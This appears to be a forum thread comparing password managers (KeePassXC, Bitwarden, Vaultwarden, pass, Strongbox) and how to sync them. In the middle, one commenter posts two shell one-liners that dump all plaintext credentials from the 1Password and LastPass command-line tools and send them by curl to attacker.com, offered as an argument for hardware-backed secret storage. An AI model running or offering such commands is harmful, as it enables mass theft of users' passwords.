Are there any good alternatives? Or do I have to use Kaspersy's password store?
I'd recommend setting a very strong password, with a key (you can generate one when you create the database) and a long decryption time.
If you need help setting strong passwords, I recommend EFF Dice-Generated Passphrases[1].
[1]: https://keepassxc.org/docs/KeePassXC_UserGuide.html#_databas...
Manual: All clients I've seen have the capability to merge databases. So you have one copy of the database in whatever online file storage service, plus each device will have its own local copy. Pull down the online db, do a bidirectional sync between the two databases, push back online.
Automatic: some clients natively support webdav, dropbox, etc as the master copy of the db file and will transparently do the change syncing for you.
There are also (unofficial) iOS and Android clients that sync to a git repo.
If you have access to the code then (on Android at least) you could build and install the APK yourself.
I moved away from 1Password after the developers essentially ridiculed their customers in their support forum. I realized that it's a hostile, aggressive and short sighted company. That they are engaging in this racist action against Russians helps assure me that I made the right decision.
Bitwarden has been a drop-in replacement for all intents and purposes.
I don’t know about this incident of them being racist, but if I leave that aside, your words sound exactly like what I would say about the company! This isn’t something new with Agile Bits ridiculing customers or potential customers on its forums. There have been instances of this several years ago too when people questioned the licensing model and asked about the changes. They essentially behave as if users are stupid and that they (Agile Bits) are the only ones who know what’s best in every case. It’s quite condescending.
Here are some trivial examples of how malware can steal credentials in bulk.
Example: Exfiltrate all plaintext credentials from 1password
``` op list items | jq -r '.[].uuid' | xargs -n1 bash -c 'op get item "$1"' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```
Example: Exfiltrate all plaintext credentials from lastpass
``` lpass ls | grep -oP '(?<=id: )([0-9]+)' | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```
I have seen fake password manager browser plugins deployed in the wild that phish and exfiltrate master passwords, though the above methods are even simpler as they could just run a loop waiting until a password manager is eventually unlocked.
Software-only password managers may be useful for casual personal use cases such as food delivery services or social media accounts, but are not recommended for any use cases that protect any significant value like production corporate systems, and in particularly not for high risk secrets such as cloud root account creds, TLS CAs, or crypto-asset keys (you know who you are).
I would strongly encourage for most use cases to consider secret management solutions that decrypt one credential at a time on external hardware such as Password Store backed with a Yubikey, Trezor password manager, or a Mooltipass.
These offer damage control even when your endpoint is compromised.
It looks useful and I'm thinking about downloading it, but if I did, I might not leave the binary as-named and I probably wouldn't locate it in /usr/local/bin, etc.
[1] https://support.1password.com/command-line-getting-started
So yes, you can do what you claim, as long as you first install the CLI tool, and then tell it to stay unlocked for some time. Or you know, just don't do that.
Do you have recommendations for software-only solutions that do this? ssh-agent has an option for it, not sure if anything else does (pass?)
If your OS is compromised you are hosed without dedicated and trusted external hardware as a gatekeeper.
I've been self hosting it for a number of years now and have never had to think about it ever again - it works, has clients for all my platforms, never had any issues.
The real problem though is that it does not support hardware security tokens at the moment.
I don’t think this comparison is accurate. With a vault-based password manager, an attacker would need the master password AND the vault. The vault is usually protected separately, either because it’s a file that’s non-public (e.g. Keepass), or because it’s a web service that’s rate-limited or otherwise monitored (e.g. 1Password Cloud).
The only difference is going to be if the remote vault requires a separate auth factor. And that's a legitimate thing to consider. But I think (but I haven't thought much about it tbh) if you have a secure master password then the situations where this matters are limited.
I can't speak to this specific implementation, but the reality is that if your master password is leaked you have to rotate every credential no matter what.
I have explored syncing of these Keepass files with Nextcloud and Syncthing and both just works fine and I can recommend it.
I've always wondered if this might be a potential vulnerability. If a file leaks some day and attacker gains an access to the file, he has infinite time to try to break a password and you cannot do anything about it. Using online password storage in theory could limit amount of login trials. Also, changing password in kdbx file has no effect as attacker still have physical access to previous file with previous password.
pro: it has much stronger security guarantees than the rest, it's self-hosted, but you can use other peoples servers!
cons: there is no UI frontend for macs, and UI integration in browser could also be improved.
(i'm the author, ama)
Is it possible to store anything but website/username/password there? I can shoehorn my ssh password like "ssh 1.2.3.4"/"username"/"password" into that scheme, but it's ugly.
Is it possible to store bank card PIN code? I'm storing it as fake website right now which is far from ideal.
I need to access all the necessary information from iPhone.
I'm still running 1P 7, testing out some other solutions to see where to go in the future. I was happy to pay for the new versions every year or two, but going hosted means they've lost many customers like me who would rather keep the password database local.
- Windows
- KeePassXC Offline for Android
- iOS
- Linux
I don’t need to use KeePass, though. There are over a dozen different forks of the KeePass project to choose from. I decided on KeePassXC for my Mac, Linux, and Windows computers; and KeePass2Android Offline for my Android phone. I decided on these two because they feel more modern and I’ve confirmed that they won’t easily suffer from synchronization conflicts.
Also curious what issues you've had with syncing, mine definitely sync at points and only occasionally require me to do a manual sync. Usually it's only an issue if I just added an entry on another device and want to immediately use it on another.
I am tempted to try gopass, but if pass is good enough for Jason Donenfeld it's good enough for me!
(In short, I’ve switched to Secrets while keeping an eye on new KeePass apps, because I don’t want to use or run any kind of service)
TIL 1Password are also looking into a self-hosted option; maybe it'll happen if more people sign on to their survey: https://survey.1password.com/self-host/.
I'm willing to pay good money for a good product in this area. (I've said elsewhere I'd probably even be happy to pay 1P subscription if they didn't also do everything they could to prevent me using anything but their cloud.)
Here is my example: I've been using 1password since 2008ish. I've purchased every upgrade since then and even had more than one license. All was fine: Data was local, there was some backup method and some plain text export.
Some time ago, 1Password decided to go cloud and change to a subscription for using the software for new users. The client I have on my mac still works fine, but the only option was to "rent" the password management that stored my data on their servers.
The owners sugarcoated this in every way (pet peeve: Talking in their mails about something completly different like recipes, then "by the way, subscription only in 3,2,1 ...").
I will not buy into being fully dependent on someone else when it comes to access to all of my online and offline systems. And you should not, too. Same goes for any company.
So any of the suggested tools here should do two things: Work independent on an online/sync-connection (and be able to access/modify data untill online connection has been reestablished). And be able to export data in a format that can be transformed/read by most of the others.
I switched to my own local instance of Bitwarden (Vaultwarden) and use the client for any device I own. Switch took about half a day and I never looked back.
For personal use keepassxc and syncthing. Keepassdx on android.
Edit: enterprise is self hosted. Keepassxc with syncthing doesn't need hosting
After trying for a test period the usual famous ones, and not being happy with anything (cloud crap, no memory encrypt, no clipboard cleaning - to just name a few) I decided to take a look at a few that were open source, learned their overall intricacies and started to code my own. At beginning nothing fancy, just a SQLite DB and simply focus on name field, system-wide shortcut for my manager to pop-up and then selecting the entry. Manager would type in the username, TAB to password field, then type the password there as well and press ENTER. That was the most rudimentary one and whenever some new web/app was not working I would see why and increase from there its code/logic.
After like 3 months I was happy with all I had the need for and very rarely, something like every 6 months, I would touch its code for maximum 2 days to make it work. It's being over 5 years at this point and use it daily on my several dozens web sites / desktop apps I need. During this time I never did a full refactoring or change its underlying business logic.
So my advice for you @vasachi, if you can, do the same. The satisfaction will be huge.
It's gully open source, with a AGPL license.
https://keepass.info/download.html
It supports having a key file on top of password.
It has plugins to import from 1password too:
KeePass with the database file hosted on Dropbox
on my Macbook I use Strongbox on my iPhone also use Strongbox
Strongbox supports biometric auth, and is really nice to use, and supports having the keepass database on many different cloud providers
- Open Source
- Great apps
- Great chrome & firefox addon
So convenient and Google is trustworthy to that extent.